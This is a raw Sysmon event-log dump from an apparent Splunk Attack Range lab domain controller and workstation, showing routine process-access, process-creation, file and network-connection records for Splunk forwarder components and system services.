09:25:33.158{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.158{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E0D-6151-C400-00000000FD01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.158{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E0D-6151-C400-00000000FD01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.159{5EBD8912-8E0D-6151-C400-00000000FD01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001057201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E0E-6151-C600-00000000FD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8E0E-6151-C600-00000000FD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E0E-6151-C600-00000000FD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.924{5EBD8912-8E0E-6151-C600-00000000FD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001057193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.455{5EBD8912-8E0E-6151-C500-00000000FD01}53405212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E0E-6151-C500-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8E0E-6151-C500-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E0E-6151-C500-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:34.252{5EBD8912-8E0E-6151-C500-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:32.376{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57711-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.070{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54278-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000981666Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:35.060{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01F006D275F7CEE7D796238493F2454D,SHA256=4AE5C0BD561FBB6C6FBA82E961A8F164A7F13301E9E4958F83729B6C8946BC5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:35.205{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90E3634EA4BF644C26609E37A35D4E8B,SHA256=9F04712ABED1DB21613980271D97FDD9FB3681FF8F897D0084F349439654DA49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:35.158{5EBD8912-8E0E-6151-C600-00000000FD01}53765316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:35.033{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8AF64A0B69C006F98F52295E5A54CDD,SHA256=9E61C56A5943D4145549DDCD4B8AD02A98CF81082485E088F0163D79DD653FF6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981665Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:31.869{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59561-false10.0.1.12-8000- 23542300x8000000000000000981667Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:36.091{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D88DCEA25CD75D34AEE581B7F36C2D5A,SHA256=C4120132831966D9328ACEE4CC53BE598BDD8D30470AE4962F69817824146CDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E10-6151-C700-00000000FD01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 